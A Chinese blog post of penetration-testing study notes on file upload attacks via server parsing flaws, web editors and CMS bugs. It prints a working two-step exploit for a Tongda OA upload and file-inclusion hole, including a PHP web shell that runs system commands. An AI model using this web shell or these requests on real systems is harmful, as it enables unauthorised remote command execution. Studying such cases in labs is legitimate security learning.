第23天-WEB 漏洞-文件上传之解析漏洞编辑器安全

已于 2022-03-14 20:26:30 修改
阅读量504 收藏 4
点赞数 2
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: 安全 前端 编辑器
于 2022-03-08 18:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123359540
版权

思维导图

在这里插入图片描述

当我们拿到一个站点去测试的时候,根据数据包或指纹信息等信息,首先获取网站使用的中间件信息,判断中间件有无解析漏洞,是否可以直接利用。

利用字典扫描、或者会员中心找到,有可能存在文件上传的上传点,而后测试 绕过/验证,根据实际情况判断是白名单、黑名单还是基于内容其他的绕过,文件上传搭配解析漏洞,是否能够上传后门,拿到权限。

再或者知道网站何种CMS,网上搜索否存在漏洞,能否利用。

或者判断网站是否使用第三方编辑器(字典扫描,会员中心,后台),可以寻找编辑器的漏洞进行突破。

再者也可以找是否存在CVE编号漏洞,并且进行利用。

都没有那可能就是没有文件上传漏洞!

演示案例:

几种中间件解析漏洞简要演示

Apache 解析漏洞-低版本

phpinfo.php.xxx 实际内容

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Apache 配置安全–vulhub
Apache 换行解析-vulhub

Vulhub - Docker-Compose file for vulnerability environment

漏洞复现

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

上传一个名为1.php的文件,被拦截:

在这里插入图片描述

在这里插入图片描述

在1.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截:

在这里插入图片描述

访问刚才上传的/1.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞:

在这里插入图片描述

很鸡肋

Nginx 解析漏洞-vulhub

Vulhub - Docker-Compose file for vulnerability environment

Nginx 文件名逻辑-vulhub

Vulhub - Docker-Compose file for vulnerability environment

参考web中间件常见漏洞总结.pdf

链接:https://pan.baidu.com/s/1vZHhhsCQVlmPlvUuYmgbvw?pwd=0a3d
提取码:0a3dIIS6/7 简要说明-本地搭建

几种常见 WEB 编辑器简要演示

Fckeditor exp 利用

ueditor 漏洞利用

UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com)

https://navisec.it/编辑器漏洞手册

几种常见 CMS 文件上传简要演示

通达 OA 系统

https://pan.baidu.com/share/init?surl=5gcdBuOFrN1F9xVN7Q7GS
A enqx

在这里插入图片描述

在这里插入图片描述

任意命令执行漏洞

路径为:ispirit/im/upload.php

抓包构造POC:

POST /ispirit/im/upload.php HTTP/1.1
Host: localhost:999
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
Content-Length: 660
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

在这里插入图片描述

在这里插入图片描述

上传成功;上传成功后访问文件包含路径/ispirit/interface/geteway.php

burp抓包构造数据包:

POST /ispirit/interface/geteway.php HTTP/1.1
Host: localhost:81
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2203/1915126119.jpg"}&cmd=whoami

按着帖子,后面一步老没有指定输入文件 ,不知道啥情况!
在这里插入图片描述

通达OA文件上传+文件包含漏洞 - 终落 - 博客园 (cnblogs.com)

贴近实际应用下的以上知识点演示

判断中间件平台,编辑器类型或 CMS 名称进行测试

IsecNoob
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
weixin_50698958的博客
10-05 272
一、概述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 参考: https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 二、漏洞环境 路径:vulhub/httpd/CVE-2017-15715 启动环境:docker-compose up -d 访.
Apache Httpd换行解析漏洞复现(CVE-2017-15715)
qq_34853514的博客
07-19 804
漏洞简介 漏洞编号: CVE-2017-15715 漏洞详情: Apache httpd是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 漏洞影响范围: Apache httpd 2.4.0~2.4.29 漏洞原理: 在httpd2.4.0~2.4.29版本中有如下配置 <FilesMatch \.php$> SetHandler
23:WEB漏洞-文件解析漏洞编辑器安全(转)
mingyqf的博客
04-01 438
23:WEB漏洞-文件解析漏洞编辑器安全 本课重点 几种常见中间件解析漏洞简要演示 案例1:中间件解析漏洞思维导图 几种常见Web编辑器简要演示 案例2:fckeditor2.6.3 文件漏洞 几种常见CMS文件简要演示 案例3:通达OA文件+文件包含漏洞 贴近实际应用下的以上知识点演示 案例4:贴近实际应用下以上知识点总结 案例1:中间件解析漏洞思维导图 演示案例见上篇博客 案例2:fckeditor2.6.3 文件漏洞 编辑器漏洞整理 <1&g
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
Li-D的博客
09-16 358
漏洞描述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 漏洞影响版本 Apache HTTPD 2.4.0~2.4.29版本 漏洞危害 攻击者可以利用此问题绕过安全限制并执行未经授权的操作。这可能有助于进一步的攻击。 漏洞分析 在Apache 2.4.0到2.4.29版本中使用到了如下的配置信息: 这是一个php文件解析
文件解析漏洞编辑器
weixin_44532761的博客
12-03 147
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=22 1.几种中间件解析漏洞演示-IIS,Apache,Nginx 搭建iis服务器 http://www.360doc.com/content/19/0523/18/2238056_837752033.shtml Apache低版本解析漏洞 phpstudy默认的是2.x 我这报500 Apache 换行解析x0a-vulhub https://vulhub.org/#/environme
计算机文化基础复习题第九套.pdf
10-06
TCP/IP协议的安全漏洞、数据库的安全漏洞也是常见的安全问题,但它们不是软件安全漏洞的定义。 4. HTML含义:HTML是HyperText Markup Language的缩写,选项B正确。它是用于创建网页的标准标记语言,可与CSS和...
JAVA上百实例源码以及开源项目
01-03
 Java访问权限控制,为Java操作文件、写入文件分配合适的权限,定义写到文件的信息、定义文件,输出到c:/hello.txt、写信息到文件、关闭输出流。 Java绘制图片火焰效果 1个目标文件 摘要:Java源码,图形操作,火焰...
官方网站下载的Apache2.4.29 x64
02-08
应用名称: Apache 2.4.29 x64 发行文件: httpd-2.4.29-o102n-x64-vc14-r2.zip 原始来源: Apache软件基金会 原创主页: http://httpd.apache.org Win64二进制文件: Apache Haus
利用最新Apache解析漏洞(CVE-2017-15715)绕过上黑名单
07-16 829
1.绕过黑名单getshell捉包,正常能上php文件,但是上失败。打开拦截流量Hex模式添加一个\x0a再次上就没有,证明上成功了。打开访问一下.这样就成功了。...
利用Vulnhub复现漏洞 - Apache HTTPD 换行解析漏洞(CVE-2017-15715)
JiangBuLiu的博客
06-27 1409
Apache HTTPD 换行解析漏洞(CVE-2017-15715)Vulnhub官方复现教程背景简述漏洞详情复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 背景简述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。 漏洞详情 其2.4.0...
Apache中间件漏洞复现
mingyqf的博客
02-13 1746
kali复现apache未知扩展名解析漏洞 2. 复现 我上了一个名字叫shell.php.aaa 的文件,当此特性存在的时候,一看.aaa不认识, 继续解析,.php我认识,解析成php文件了。访问也是同理,比如访问phpinfo.php.qqq可成功显示phpinfo 那么哪些后缀Apache不认识? 不在mime.types当中的都不认识 (Multipurpose Internet Mail Extensions) sudo service apache2 restart cd /etc/apac
Apache中间件漏洞学习
E1even的博客
10-19 3812
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 原理: apache2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 复现: 首先这里查看index.php <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSI
【CVE-2017-15715】复现Apache解析漏洞
weixin_44723534的博客
04-10 3563
环境准备 Vulhub漏洞环境介绍 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应的目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 一、使用Ubuntu搭建vulhub漏洞环境 1.1 更新软件库 执行命令:apt-get update 1.1.1 更新软件库报错解决方法 1.2 安装curl apt-get install curl 执行命令:apt-get install curl 1.3 安装pip
中间件漏洞 | Apache-路径穿越升级版
weixin_52116519的博客
11-02 484
看Apache的2.4.29版本的漏洞理解了,那么这个漏洞也很容易理解。Apache HTTP Server 2.4.50 路径穿越漏洞Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。该漏洞可以影响Apache HTTP Server。
Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
今天也要加油鸭
03-25 5769
文章目录一、Apache httpd 多后缀解析漏洞漏洞原理漏洞复现漏洞修复 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 一、Apache h...
web网站文件漏洞和攻击-运维安全详细笔记
最新发布
06-30
web网站文件漏洞和攻击-运维安全详细笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值